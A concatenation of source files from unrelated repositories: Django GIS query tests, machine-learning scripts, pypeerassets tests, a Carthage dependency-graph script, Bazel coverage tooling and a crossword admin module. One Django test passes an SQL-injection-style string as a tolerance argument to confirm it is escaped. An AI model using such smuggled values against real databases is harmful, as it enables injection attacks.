("same_as", Point(1, 1)),
("exact", Point(1, 1)),
("coveredby", Point(1, 1)),
("covers", Point(1, 1)),
]
for lookup, geom in queries:
with self.subTest(lookup=lookup):
self.assertNotIn(
null, State.objects.filter(**{"poly__%s" % lookup: geom})
)
def test_wkt_string_in_lookup(self):
# Valid WKT strings don't emit error logs.
with self.assertNoLogs("django.contrib.gis", "ERROR"):
State.objects.filter(poly__intersects="LINESTRING(0 0, 1 1, 5 5)")
@skipUnlessDBFeature("supports_relate_lookup")
def test_relate_lookup(self):
"Testing the 'relate' lookup type."
# To make things more interesting, we will have our Texas reference point in
# different SRIDs.
pnt1 = fromstr("POINT (649287.0363174 4177429.4494686)", srid=2847)
pnt2 = fromstr("POINT(-98.4919715741052 29.4333344025053)", srid=4326)
# Not passing in a geometry as first param raises a TypeError when
# initializing the QuerySet.
with self.assertRaises(ValueError):
Country.objects.filter(mpoly__relate=(23, "foo"))
# Making sure the right exception is raised for the given
# bad arguments.
for bad_args, e in [
((pnt1, 0), ValueError),
((pnt2, "T*T***FF*", 0), ValueError),
]:
qs = Country.objects.filter(mpoly__relate=bad_args)
with self.assertRaises(e):
qs.count()
contains_mask = "T*T***FF*"
within_mask = "T*F**F***"
intersects_mask = "T********"
# Relate works differently on Oracle.
if connection.ops.oracle:
contains_mask = "contains"
within_mask = "inside"
# TODO: This is not quite the same as the PostGIS mask above
intersects_mask = "overlapbdyintersect"
# Testing contains relation mask.
if connection.features.supports_transform:
self.assertEqual(
Country.objects.get(mpoly__relate=(pnt1, contains_mask)).name,
"Texas",
)
self.assertEqual(
"Texas", Country.objects.get(mpoly__relate=(pnt2, contains_mask)).name
)
# Testing within relation mask.
ks = State.objects.get(name="Kansas")
self.assertEqual(
"Lawrence", City.objects.get(point__relate=(ks.poly, within_mask)).name
)
# Testing intersection relation mask.
if not connection.ops.oracle:
if connection.features.supports_transform:
self.assertEqual(
Country.objects.get(mpoly__relate=(pnt1, intersects_mask)).name,
"Texas",
)
self.assertEqual(
"Texas", Country.objects.get(mpoly__relate=(pnt2, intersects_mask)).name
)
self.assertEqual(
"Lawrence",
City.objects.get(point__relate=(ks.poly, intersects_mask)).name,
)
# With a complex geometry expression
mask = "anyinteract" if connection.ops.oracle else within_mask
self.assertFalse(
City.objects.exclude(
point__relate=(functions.Union("point", "point"), mask)
)
)
def test_gis_lookups_with_complex_expressions(self):
multiple_arg_lookups = {
"dwithin",
"relate",
} # These lookups are tested elsewhere.
lookups = connection.ops.gis_operators.keys() - multiple_arg_lookups
self.assertTrue(lookups, "No lookups found")
for lookup in lookups:
with self.subTest(lookup):
City.objects.filter(
**{"point__" + lookup: functions.Union("point", "point")}
).exists()
def test_subquery_annotation(self):
multifields = MultiFields.objects.create(
city=City.objects.create(point=Point(1, 1)),
point=Point(2, 2),
poly=Polygon.from_bbox((0, 0, 2, 2)),
)
qs = MultiFields.objects.annotate(
city_point=Subquery(
City.objects.filter(
id=OuterRef("city"),
).values("point")
),
).filter(
city_point__within=F("poly"),
)
self.assertEqual(qs.get(), multifields)
class GeoQuerySetTest(TestCase):
# TODO: GeoQuerySet is removed, organize these test better.
fixtures = ["initial"]
@skipUnlessDBFeature("supports_extent_aggr")
def test_extent(self):
"""
Testing the `Extent` aggregate.
"""
# Reference query:
# SELECT ST_extent(point)
# FROM geoapp_city
# WHERE (name='Houston' or name='Dallas');`
# => BOX(-96.8016128540039 29.7633724212646,-95.3631439208984 32.7820587158203)
expected = (
-96.8016128540039,
29.7633724212646,
-95.3631439208984,
32.782058715820,
)
qs = City.objects.filter(name__in=("Houston", "Dallas"))
extent = qs.aggregate(Extent("point"))["point__extent"]
for val, exp in zip(extent, expected):
self.assertAlmostEqual(exp, val, 4)
self.assertIsNone(
City.objects.filter(name=("Smalltown")).aggregate(Extent("point"))[
"point__extent"
]
)
@skipUnlessDBFeature("supports_extent_aggr")
def test_extent_with_limit(self):
"""
Testing if extent supports limit.
"""
extent1 = City.objects.aggregate(Extent("point"))["point__extent"]
extent2 = City.objects.all()[:3].aggregate(Extent("point"))["point__extent"]
self.assertNotEqual(extent1, extent2)
def test_make_line(self):
"""
Testing the `MakeLine` aggregate.
"""
if not connection.features.supports_make_line_aggr:
with self.assertRaises(NotSupportedError):
City.objects.aggregate(MakeLine("point"))
return
# MakeLine on an inappropriate field returns simply None
self.assertIsNone(State.objects.aggregate(MakeLine("poly"))["poly__makeline"])
# Reference query:
# SELECT AsText(ST_MakeLine(geoapp_city.point)) FROM geoapp_city;
ref_line = GEOSGeometry(
"LINESTRING(-95.363151 29.763374,-96.801611 32.782057,"
"-97.521157 34.464642,174.783117 -41.315268,-104.609252 38.255001,"
"-95.23506 38.971823,-87.650175 41.850385,-123.305196 48.462611)",
srid=4326,
)
# We check for equality with a tolerance of 10e-5 which is a lower bound
# of the precisions of ref_line coordinates
line = City.objects.aggregate(MakeLine("point"))["point__makeline"]
self.assertTrue(
ref_line.equals_exact(line, tolerance=10e-5), "%s != %s" % (ref_line, line)
)
@skipUnlessDBFeature("supports_union_aggr")
def test_unionagg(self):
"""
Testing the `Union` aggregate.
"""
tx = Country.objects.get(name="Texas").mpoly
# Houston, Dallas -- Ordering may differ depending on backend or GEOS version.
union = GEOSGeometry("MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)")
qs = City.objects.filter(point__within=tx)
with self.assertRaises(ValueError):
qs.aggregate(Union("name"))
# Using `field_name` keyword argument in one query and specifying an
# order in the other (which should not be used because this is
# an aggregate method on a spatial column)
u1 = qs.aggregate(Union("point"))["point__union"]
u2 = qs.order_by("name").aggregate(Union("point"))["point__union"]
self.assertTrue(union.equals(u1))
self.assertTrue(union.equals(u2))
qs = City.objects.filter(name="NotACity")
self.assertIsNone(qs.aggregate(Union("point"))["point__union"])
@skipUnlessDBFeature("supports_union_aggr")
def test_geoagg_subquery(self):
tx = Country.objects.get(name="Texas")
union = GEOSGeometry("MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)")
# Use distinct() to force the usage of a subquery for aggregation.
with CaptureQueriesContext(connection) as ctx:
self.assertIs(
union.equals(
City.objects.filter(point__within=tx.mpoly)
.distinct()
.aggregate(
Union("point"),
)["point__union"],
),
True,
)
self.assertIn("subquery", ctx.captured_queries[0]["sql"])
@skipUnlessDBFeature("supports_tolerance_parameter")
def test_unionagg_tolerance(self):
City.objects.create(
point=fromstr("POINT(-96.467222 32.751389)", srid=4326),
name="Forney",
)
tx = Country.objects.get(name="Texas").mpoly
# Tolerance is greater than distance between Forney and Dallas, that's
# why Dallas is ignored.
forney_houston = GEOSGeometry(
"MULTIPOINT(-95.363151 29.763374, -96.467222 32.751389)",
srid=4326,
)
self.assertIs(
forney_houston.equals_exact(
City.objects.filter(point__within=tx).aggregate(
Union("point", tolerance=32000),
)["point__union"],
tolerance=10e-6,
),
True,
)
@skipUnlessDBFeature("supports_tolerance_parameter")
def test_unionagg_tolerance_escaping(self):
tx = Country.objects.get(name="Texas").mpoly
with self.assertRaises(DatabaseError):
City.objects.filter(point__within=tx).aggregate(
Union("point", tolerance="0.05))), (((1"),
)
def test_within_subquery(self):
"""
Using a queryset inside a geo lookup is working (using a subquery)
(#14483).
"""
tex_cities = City.objects.filter(
point__within=Country.objects.filter(name="Texas").values("mpoly")
).order_by("name")
self.assertEqual(
list(tex_cities.values_list("name", flat=True)), ["Dallas", "Houston"]
)
def test_non_concrete_field(self):
NonConcreteModel.objects.create(point=Point(0, 0), name="name")
list(NonConcreteModel.objects.all())
def test_values_srid(self):
for c, v in zip(City.objects.all(), City.objects.values()):
self.assertEqual(c.point.srid, v["point"].srid)
``` |
{
"source": "jo-m/ml-projects",
"score": 3
} |
#### File: ml-projects/project1/utils.py
```python
from scipy.stats.stats import pearsonr
import matplotlib.pyplot as plt
import numpy as np
# compute correlation between features
def compute_correlation(Xtrain):
for i in range(0, Xtrain.shape[1]):
for j in range(i+1, Xtrain.shape[1]):
correlation = pearsonr(Xtrain[:, i], Xtrain[:, j])[0]
if correlation > 0.3 or correlation < -0.3:
print ('correlation between', i, "and", j, " feature is", correlation)
# plot features with y, x sorted
def plotFeatures (X, Y):
MAX_FEATURES = 15
Y = np.exp(Y)
permY = np.argsort(Y, axis=0)
plt.title("Y")
plt.plot(Y[permY])
plt.show()
for i in range(0, np.min(MAX_FEATURES, X.shape[1])):
column = X[:, i]
perm = np.argsort(column, axis=0)
plt.title("feature " + str(i))
plt.plot(column[perm], Y[perm], 'bo')
plt.show()
```
#### File: ml-projects/project3/process.py
```python
import pandas as pd
from sklearn.grid_search import GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from datetime import datetime
import xgboost as xgb
import sklearn.cross_validation as skcv
import sklearn.metrics as skmet
from utils import *
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.cross_validation import KFold
def load_data(train=True):
if train:
fname = 'data/train.csv'
else:
fname = 'data/test_validate.csv'
dataT = pd.read_csv(fname,
index_col=None,
header=None)
dataT = dataT.as_matrix().astype(float)
if train:
dataT = dataT[:, :-1]
if train:
name = 'data/train_labels.csv'
Y = pd.read_csv(name,
index_col=None,
header=None)
# labels also have index as the first column
Y = Y[1].as_matrix().astype(int)
else:
Y = None
return dataT, Y
def score(Ytruth, Ypred):
Ytruth = Ytruth.ravel()
Ypred = Ypred.ravel()
if Ytruth.ndim != 1:
raise Exception('Ytruth has invalid shape!')
if Ypred.ndim != 1:
raise Exception('Ypred has invalid shape!')
sum = (Ytruth == Ypred).astype(float).sum().sum()
return sum / np.product(Ytruth.shape)
def run_crossval(X, Y, model):
scores = []
kf = KFold(X.shape[0], n_folds=10)
for train, test in kf:
model.fit(X[train], Y[train])
Ypred = model.predict(X[test])
sc = score(Y[test], Ypred)
scores.append(sc)
print 'C-V score %s' % (str(np.mean(scores)))
print 'std %s' % str(np.std(scores))
def run_split(X, Y, model):
Xtrain, Xtest, Ytrain, Ytest = skcv.train_test_split(X, Y, train_size=.9)
Xtrain, Xtest = Xtrain[:, 1:], Xtest[:, 1:]
model.fit(Xtrain, Ytrain)
Ypred = model.predict(Xtest)
scored = score(Ypred, Ytest)
print "Split-score = %f" % scored
return scored
def write_Y(Y):
if Y.shape[1] != 2:
raise 'Y has invalid shape!'
np.savetxt('results/Ypred{0}.csv'.format(datetime.now().strftime('%Y-%m-%d,%H:%M:%S')), Y,
fmt='%d', delimiter=',', header='Id,Label', comments='')
def run_validate(Xtrain, Ytrain, model):
model.fit(Xtrain[:, 1:], Ytrain)
Xvalidate, _ = load_data(train=False)
Xvalidate_ids = Xvalidate[:, 0]
Yvalidate = model.predict(Xvalidate[:, 1:])
ret = np.vstack((Xvalidate_ids, Yvalidate)).T
write_Y(ret)
print 'wrote validate'
def run_gridsearch(X, Y, model):
parameters = {
'reg__n_estimators': [300, 500, 1250, 1500, 1750, 2500, 3000],
'reg__learning_rate': [0.001, 0.003, 0.005, 0.006, 0.01],
'reg__max_depth': [3, 5, 7, 9],
'reg__subsample': [0.5, 0.7, 0.9],
'selector__k': [100, 120, 150, 200, 300, 400, 'all'],
}
grid = GridSearchCV(model, parameters, verbose=1, n_jobs=-1, cv=5)
grid.fit(X[:, 1:], Y)
for p in parameters.keys():
print 'Gridseach: param %s = %s' % (
p, str(grid.best_estimator_.get_params()[p]))
return grid.best_estimator_
def build_pipe():
scaler = Scaler
selector = SelectKBest(chi2, k=120)
regressor = xgb.XGBClassifier(n_estimators=500, learning_rate=0.01, max_depth=5, subsample=0.5)
return Pipeline([
('scaler', scaler),
('selector', selector),
('reg', regressor),
])
Xtrain, Ytrain = load_data()
Scaler = StandardScaler(with_mean=False) # do not subtract the mean,
# chi2 does not accept negative numbers
pipe = build_pipe()
# pipe = run_gridsearch(Xtrain, Ytrain, pipe)
run_crossval(Xtrain, Ytrain, pipe)
run_split(Xtrain, Ytrain, pipe)
run_validate(Xtrain, Ytrain, pipe)
``` |
{
"source": "jommy99/pypeerassets",
"score": 2
} |
#### File: pypeerassets/test/test_pautils.py
```python
from typing import Generator
import pytest
from pypeerassets import (
Deck,
find_deck
)
from pypeerassets.provider import Cryptoid, Explorer, RpcNode
from pypeerassets.exceptions import *
from pypeerassets.paproto_pb2 import DeckSpawn
from pypeerassets.pautils import *
from pypeerassets.protocol import IssueMode, CardTransfer
from pypeerassets.pa_constants import param_query
@pytest.mark.xfail
def test_load_p2th_privkeys_into_local_node():
provider = RpcNode(testnet=True)
load_p2th_privkeys_into_local_node(provider=provider)
@pytest.mark.parametrize("prov", ["explorer", "cryptoid"])
def test_find_tx_sender(prov):
if prov == "explorer":
provider = Explorer(network="peercoin")
rawtx = provider.getrawtransaction("397bda2f5e6608c872a663b2e5482d95db8ecfad00757823f0f12caa45a213a6", 1)
assert find_tx_sender(provider, rawtx) == 'PNHGzKupyvo2YZVb1CTdRxtCGBB5ykgiug'
if prov == "cryptoid":
provider = Cryptoid(network="peercoin")
rawtx = provider.getrawtransaction("397bda2f5e6608c872a663b2e5482d95db8ecfad00757823f0f12caa45a213a6", 1)
assert find_tx_sender(provider, rawtx) == 'PNHGzKupyvo2YZVb1CTdRxtCGBB5ykgiug'
@pytest.mark.parametrize("prov", ["explorer", "cryptoid"])
def test_find_deck_spawns(prov):
if prov == "explorer":
provider = Explorer(network="peercoin")
if prov == "cryptoid":
provider = Cryptoid(network="peercoin")
assert isinstance(find_deck_spawns(provider), Generator)
@pytest.mark.parametrize("prov", ["rpc", "explorer"])
def test_tx_serialization_order(prov):
if prov == "explorer":
provider = Explorer(network="peercoin-testnet")
assert tx_serialization_order(provider,
txid="f968702bcedc107959aae2c2b1a1becdccbfe7e5a32b460b2c13c1adaa33d541", blockhash="e234d2ef69f7cd1e7ee489546b39314cc838763b4e32438106cba657d9749f2f") == 1
try:
if prov == "rpc":
provider = RpcNode(testnet=True)
assert tx_serialization_order(provider,
txid="f968702bcedc107959aae2c2b1a1becdccbfe7e5a32b460b2c13c1adaa33d541", blockhash="e234d2ef69f7cd1e7ee489546b39314cc838763b4e32438106cba657d9749f2f") == 1
except:
print("No RpcNode avaliable.")
def test_read_tx_opreturn():
vout = [{'n': 0,
'scriptPubKey': {'addresses': ['<KEY>'],
'asm': 'OP_DUP OP_HASH160 1e667ee94ea8e62c63fe59a0269bb3c091c86ca3 OP_EQUALVERIFY OP_CHECKSIG',
'hex': '76a9141e667ee94ea8e62c63fe59a0269bb3c091c86ca388ac',
'reqSigs': 1,
'type': 'pubkeyhash'},
'value': 0.01},
{'n': 1,
'scriptPubKey': {'asm': 'OP_RETURN 0801120f736978746f5f726f6472696775657a18052004',
'hex': '6a170801120f736978746f5f726f6472696775657a18052004',
'type': 'nulldata'},
'value': 0}
]
assert isinstance(read_tx_opreturn(vout[1]), bytes)
assert read_tx_opreturn(vout[1]) == b'\x08\x01\x12\x0fsixto_rodriguez\x18\x05 \x04'
def generate_dummy_deck():
return Deck(
name="decky",
number_of_decimals=2,
issue_mode=IssueMode.SINGLET.value,
network="ppc",
production=True,
version=1,
asset_specific_data="just testing.",
)
def test_deck_issue_mode():
'''test enum to issue_mode conversion'''
deck_meta = DeckSpawn()
deck_meta.issue_mode = 3
assert isinstance(deck_issue_mode(deck_meta), Generator)
assert list(deck_issue_mode(deck_meta)) == ['CUSTOM', 'ONCE']
# Check that we handle NONE mode correctly.
deck_meta.issue_mode = 0
assert list(deck_issue_mode(deck_meta)) == ['NONE']
def test_issue_mode_to_enum():
'''test issue mode to enum conversion'''
deck = generate_dummy_deck().metainfo_to_protobuf
deck_meta = DeckSpawn()
deck_meta.ParseFromString(deck)
assert isinstance(issue_mode_to_enum(deck_meta,
["CUSTOM", "SINGLET"]), int)
def test_parse_deckspawn_metainfo():
'''tests if loading of deck parameteres from protobuf works as it should.'''
string = b'\x08\x01\x12\x0cmy_test_deck\x18\x03 \x02'
assert parse_deckspawn_metainfo(string, 1) == {'issue_mode': IssueMode.ONCE.value,
'name': 'my_test_deck',
'number_of_decimals': 3,
'version': 1,
'asset_specific_data': b''
}
string = b'\x08\x01\x18\x05 \x04' # without deck name
with pytest.raises(InvalidDeckMetainfo):
parse_deckspawn_metainfo(string, 1)
def test_validate_deckspawn_p2th():
'''test deckspawn p2th validation'''
provider = Explorer(network="peercoin-testnet")
p2th = param_query('peercoin-testnet').P2TH_addr
raw_tx = provider.getrawtransaction('643dccd585211766fc03f71e92fbf299cfc2bdbf3f2cae0ad85adec3141069f3', 1,)
assert validate_deckspawn_p2th(provider, raw_tx, p2th)
@pytest.mark.xfail
def test_load_deck_p2th_into_local_node():
provider = RpcNode(testnet=True)
deck = generate_dummy_deck()
load_deck_p2th_into_local_node(provider, deck)
def test_validate_card_transfer_p2th():
provider = Cryptoid(network="peercoin-testnet")
deck = find_deck(provider, "643dccd585211766fc03f71e92fbf299cfc2bdbf3f2cae0ad85adec3141069f3", 1)
raw_tx = provider.getrawtransaction("809c506bc3add9e46a4d3a65348426688545213da5fb5b524acd380f2cdaf3cc", 1)
validate_card_transfer_p2th(deck, raw_tx['vout'][0])
def test_parse_card_transfer_metainfo():
card = b'\x08\x01\x12\n\xd0\xd2=\x80\x89z\xee\x83\xb8\x01\x18\x05'
res = parse_card_transfer_metainfo(card, 1)
assert isinstance(res, dict)
def test_card_postprocess():
card = {'amount': [1000000], 'number_of_decimals': 3, 'version': 1}
vout = [
{
"value": 0.01,
"n": 0,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 3d9df85b2c05f0c95347e1738034e0653cd61269 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a9143d9df85b2c05f0c95347e1738034e0653cd6126988ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mm8kkiLVQfLtLGJk52KX57SUpjXxvJ7kop"
]
}
},
{
"value": 0,
"n": 1,
"scriptPubKey": {
"asm": "OP_RETURN 080112010a1803",
"hex": "6a07080112010a1803",
"type": "nulldata"
}
},
{
"value": 0,
"n": 2,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 5f64e161b433fb843de5e19411e2a02136cda453 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a9145f64e161b433fb843de5e19411e2a02136cda45388ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mpDMLa4N6hskcuJpTkcLTd4HB7Q2yF22bG"
]
}
},
{
"value": 99.92,
"n": 3,
"scriptPubKey": {
"asm": "OP_DUP OP_HASH160 60f36fdcd16dfaba412b50d9a0af53fa2260b6a6 OP_EQUALVERIFY OP_CHECKSIG",
"hex": "76a91460f36fdcd16dfaba412b50d9a0af53fa2260b6a688ac",
"reqSigs": 1,
"type": "pubkeyhash",
"addresses": [
"mpManmQf6CT84xGE5zciktTmWmfHdErUQW"
]
}
}
]
assert isinstance(card_postprocess(card, vout), list)
def test_amount_to_exponent():
assert isinstance(amount_to_exponent(88.99, 3), int)
assert amount_to_exponent(88.99, 3) == 88990
def test_exponent_to_amount():
assert isinstance(exponent_to_amount(10, 6), float)
assert exponent_to_amount(10, 3) == 0.01
``` |
{
"source": "jomnius/carthage_dep",
"score": 2
} |
#### File: jomnius/carthage_dep/carthage_dep.py
```python
import os
import sys
clean_names = {
"adjust/ios_sdk": "Adjust",
"accengage-ios-sdk-releases": "Accengage",
"accengage-ios-extension-sdk-releases": "Accengage\nextension",
"usabilla-u4a-ios-swift-sdk": "Usabilla",
"test-cloud-xcuitest-extensions": "Xamarin\nXCUITest\nextensions",
"SwinjectStoryboard": "Swinject\nStoryboard",
"ios-snapshot-test-case": "iOSSnapshot\nTestCase",
}
def find_files(path, filenames):
found = []
exclude_ios = ["Carthage", ".git", "Index", "Build", "Pods"]
exclude_android = ["bundle"]
exclude_dirs = exclude_ios + exclude_android
for filename in filenames:
filename = filename.lower()
for root, dirs, files in os.walk(path):
dirs[:] = [x for x in dirs if x not in exclude_dirs]
for file in files:
if filename == file.lower():
found.append(os.path.join(root, file))
return found
def parse_cartfile(filename, show_version):
found = []
module_name = filename.split("/")[-2]
file = open(filename, "r")
for line in file:
result = []
items = filter(None, line.strip().split(" "))
if len(items) < 3 or (items[0].startswith("#")):
continue
# Module that has dependencies
result.append(module_name)
# Dependency (full) name
dependency = parse_dependency_name(items[1])
result.append(dependency)
# Dependency (short) name with version
if show_version:
if len(items) > 3 and not items[3].startswith("#"):
items[2] = "%s %s" % (items[2], items[3])
result.append(items[2].strip('"'))
found.append(result)
file.close()
return found
def parse_dependency_name(items):
dependency_fullname = items.strip('"')
dependency_fullname = clean_dependency_name(dependency_fullname, clean_names)
dependency = filter(None, dependency_fullname.strip().split("/"))[-1]
dependency = clean_dependency_name(dependency, clean_names)
if dependency.endswith((".git", ".json", ".swift")):
dependency = dependency[: dependency.rfind(".")]
return dependency
def clean_dependency_name(name, dictionary):
return dictionary[name] if name in dictionary.keys() else name
def generate_dot_graph(files, data, show_title):
lines = []
for module in data:
for item in module:
if len(item) == 2:
(framework, dependency) = item
lines.append([framework, dependency])
elif len(item) == 3:
(framework, dependency, version) = item
lines.append(
[
framework,
dependency,
"%s\\n%s" % (dependency.split("/")[-1], version),
]
)
# lines.sort(key = lambda x:x[1])
# Dot header
graph_data = "digraph G {\nconcentrate = true\n"
if show_title:
graph_data += 'labelloc = t\nlabel = "' + ",\n".join(files) + '"\n'
graph_data += "\n"
# Dot graph
for line in lines:
if len(line) == 2:
graph_data += '"%s" -> "%s"\n' % (line[0], line[1])
elif len(line) == 3:
graph_data += '"%s" -> "%s" -> "%s"\n' % (line[0], line[1], line[2])
# Dot footer
graph_data += "}\n"
return graph_data
#####
path = os.getcwd()
# Poor man's command line parameters
# carthage_dep.py --use-resolved --ignore_version
use_resolved = False
show_version = False
show_title = False
if len(sys.argv) > 1:
for arg in sys.argv:
if arg.endswith("resolved"):
use_resolved = True
elif arg.endswith("version"):
show_version = True
elif arg.endswith("files"): # --list-files
show_title = True
files = []
if use_resolved:
files = find_files(path, ["Cartfile.resolved"])
else:
files = find_files(path, ["Cartfile", "Cartfile.private"])
found = []
for filename in files:
found.append(parse_cartfile(filename, show_version))
dot_graph = generate_dot_graph(files, found, show_title)
print(dot_graph)
``` |
{
"source": "jomof/CppBuildCacheWorkInProgress",
"score": 2
} |
#### File: bazel/coverage/baseline.bzl
```python
load("@//tools/base/bazel:merge_archives.bzl", "merge_jars")
def setup_bin_loop_repo():
native.new_local_repository(
name = "baseline",
path = "bazel-bin",
build_file_content = """
load("@cov//:baseline.bzl", "construct_baseline_processing_graph")
construct_baseline_processing_graph()
""",
)
# correctness requires that *.coverage.baseline.srcs be deleted
# to ensure that any deleted targets do not hang around and interfere
# studio_coverage.sh does this via a `bazel clean`
# report.sh does this via an explicit `find` and `rm`
def construct_baseline_processing_graph():
srcs = native.glob(["**/*.coverage.baseline.srcs"])
# turn `package/target.coverage.baseline.srcs`
# into `package:target`
pts = [":".join(s.rsplit("/", 1)).replace(".coverage.baseline.srcs", "") for s in srcs]
native.genrule(
name = "merged-baseline-srcs",
# turn `package:target`
# into `@//package:target_coverage.baseline.srcs.filtered`
srcs = ["@//{}_coverage.baseline.srcs.filtered".format(pt) for pt in pts],
outs = ["merged-baseline-srcs.txt"],
cmd = "cat $(SRCS) | sort | uniq >$@",
visibility = ["@cov//:__pkg__", "@results//:__pkg__"],
)
merge_jars(
name = "merged-baseline-jars",
# turn `package:target`
# into `@//package:target_coverage.baseline.jar`
jars = ["@//{}_coverage.baseline.jar".format(pt) for pt in pts],
out = "merged-baseline-jars.jar",
# use this for now b/c of duplicate META-INF/plugin.xml
# theoretically allows for a duplicate class problem in Jacoco processing
# however, as these are all directly from non-transitive source class jars
# it shouldn't be a problem as we don't have overlapping source targets
allow_duplicates = True,
visibility = ["@cov//:__pkg__", "@results//:__pkg__"],
)
native.genrule(
name = "merged-baseline-exempt_markers",
# turn `package:target`
# into `@//package:target_coverage.baseline.exempt_markers`
srcs = ["@//{}_coverage.baseline.exempt_markers".format(pt) for pt in pts],
outs = ["merged-exempt_markers.txt"],
cmd = "cat $(SRCS) >$@",
visibility = ["@cov//:__pkg__"],
)
```
#### File: bazel/coverage/filter_lcov.py
```python
import sys
def read_lcov():
file_line_cov = {} # map[test][file][line] = covered
current_sf = None
current_tn = None
for line in sys.stdin:
line = line.strip()
if line[:3] == "TN:":
current_tn = line[3:]
if current_tn not in file_line_cov:
file_line_cov[current_tn] = {}
elif line[:3] == "SF:":
current_sf = line[3:]
file_line_cov[current_tn][current_sf] = {}
elif line[:3] == "DA:":
[num, hit] = line[3:].split(",")
file_line_cov[current_tn][current_sf][int(num)] = hit != "0" # convert to bool
else:
pass
return file_line_cov
def is_excluded(path, excludes):
# if no excludes are specified then this is skipped and nothing is excluded
for e in excludes:
if path.startswith(e):
# matched an excluded prefix so finished with excludes
return True
return False
def is_included(path, includes):
for i in includes:
if path.startswith(i):
# matched an included prefix so finished with includes
return True
return False
def write_lcov(filtered_cov):
for tn in sorted(filtered_cov):
for filepath in sorted(filtered_cov[tn]):
sys.stdout.write('TN:{}\n'.format(tn))
sys.stdout.write('SF:{}\n'.format(filepath))
for line in sorted(filtered_cov[tn][filepath]):
sys.stdout.write('DA:{},{}\n'.format(line, int(filtered_cov[tn][filepath][line])))
sys.stdout.write('end_of_record\n')
def main():
prefixes = sys.argv[1:]
includes = [x for x in prefixes if not x.startswith("-")]
excludes = [x[1:] for x in prefixes if x.startswith("-")]
file_line_cov = read_lcov()
after_excludes = {}
for tn in file_line_cov:
after_excludes[tn] = {f: file_line_cov[tn][f] for f in file_line_cov[tn] if not is_excluded(f, excludes)}
filtered = after_excludes # by default include everything
if len(includes) > 0: # but if there are explicit includes then only include those
filtered = {}
for tn in after_excludes:
filtered[tn] = {f: after_excludes[tn][f] for f in after_excludes[tn] if is_included(f, includes)}
write_lcov(filtered)
if __name__ == '__main__':
main()
```
#### File: tests/perf-test/perf_test.bzl
```python
load("//tools/base/transport/test-framework:transport_test.bzl", "transport_test")
load("//tools/base/bazel:android.bzl", "dex_library")
# Run an integration test that verifes profiler APIs.
#
# srcs: One or more test classes to run under this test.
# test_app: A target that represents a mock app (i.e. a collection of mock
# Android activities.
def perf_test(
name,
srcs,
test_app,
deps = [],
jvm_flags = [],
data = [],
tags = [],
app_runtime_deps = [],
size = None):
# Copy the undexed version of the test app and transform its bytecode with
# profiler hooks. This is how profilers work when targetting devices that
# don't support jvmti.
native.genrule(
name = name + "_transformed_undexed",
srcs = [test_app + "_undexed_deploy.jar"],
outs = [name + "_transformed_undexed_deploy.jar"],
cmd = select({
"//tools/base/bazel:darwin": "cp ./$< ./$@",
"//tools/base/bazel:windows": "cp ./$< ./$@",
"//conditions:default": "$(location //tools/base/profiler/tests/profiler-transform-main:profilers-transform-main) ./$< ./$@",
}),
executable = 1,
exec_tools = select({
"//tools/base/bazel:darwin": [],
"//tools/base/bazel:windows": [],
"//conditions:default": [
"//tools/base/profiler/tests/profiler-transform-main:profilers-transform-main",
],
}),
tags = tags,
)
dex_library(
name = name + "_transformed",
jars = [name + "_transformed_undexed_deploy.jar"],
)
transport_test(
name = name,
srcs = srcs,
deps = deps + [
"//tools/base/profiler/tests/test-framework",
],
app_dexes = [test_app],
app_dexes_nojvmti = [
":profiler-service",
name + "_transformed",
],
app_runtime_deps = app_runtime_deps + [
"//tools/base/profiler/app:perfa_java",
"//tools/base/profiler/app:perfa_okhttp",
"//tools/base/profiler/native/agent:libsupportjni.so",
],
tags = tags,
size = size,
jvm_flags = jvm_flags,
)
``` |
{
"source": "jomono/dmarc-viewer",
"score": 2
} |
#### File: dmarc-viewer/website/middleware.py
```python
import json
from django.contrib import messages
from django.template import Template, Context
def ajax_bootstrap_message(get_response):
def middleware(request):
response = get_response(request)
if (request.is_ajax() and response["Content-Type"]
in ["application/javascript", "application/json"]):
try:
content = json.loads(response.content)
except Exception as e:
return response
content["ajax_message_block"] = Template(
"{% load bootstrap3 %}"
"{% bootstrap_messages messages %}").render(
Context({
"messages": messages.get_messages(request)
}
)
)
response.content = json.dumps(content)
return response
return middleware
``` |
{
"source": "jomoore/threepins",
"score": 3
} |
#### File: threepins/puzzle/admin.py
```python
import json
from xml.etree import ElementTree
from django.contrib import admin
from django.db.models import CharField
from django.forms import TextInput, FileField, ModelForm
from puzzle.models import Puzzle, Entry, Blank, Block
XMLNS = '{http://crossword.info/xml/rectangular-puzzle}'
def import_from_xml(xml, puzzle):
"""Load a puzzle from Crossword Compiler XML format into the database."""
# pylint: disable=no-member
# false +ve on xml.etree.ElementTree.Element (v1.64)
crossword = ElementTree.parse(xml).find('*/%scrossword' % XMLNS)
for word in crossword.iter('%sword' % XMLNS):
xraw = word.attrib['x'].split('-')
yraw = word.attrib['y'].split('-')
xstart = int(xraw[0])
ystart = int(yraw[0])
down = len(yraw) > 1
clue = crossword.find('*/%sclue[@word="%s"]' % (XMLNS, word.attrib['id'])).text
if 'solution' in word.attrib:
answer = word.attrib['solution']
else:
answer = ''
if down:
for y in range(ystart, int(yraw[1]) + 1):
answer += crossword.find('*/%scell[@x="%d"][@y="%d"]' %
(XMLNS, xstart, y)).attrib['solution'].lower()
else:
for x in range(xstart, int(xraw[1]) + 1):
answer += crossword.find('*/%scell[@x="%d"][@y="%d"]' %
(XMLNS, x, ystart)).attrib['solution'].lower()
# XML is 1-based, model is 0-based
xstart -= 1
ystart -= 1
entry = Entry(puzzle=puzzle, clue=clue, answer=answer, x=xstart, y=ystart, down=down)
entry.save()
def import_blank_from_ipuz(ipuz, blank):
"""Load a blank grid from an ipuz file into the database."""
data = json.loads(ipuz.read().decode('latin_1'))
for y, row in enumerate(data['puzzle']):
for x, cell in enumerate(row):
if cell == "#":
block = Block(blank=blank, x=x, y=y)
block.save()
class PuzzleImportForm(ModelForm):
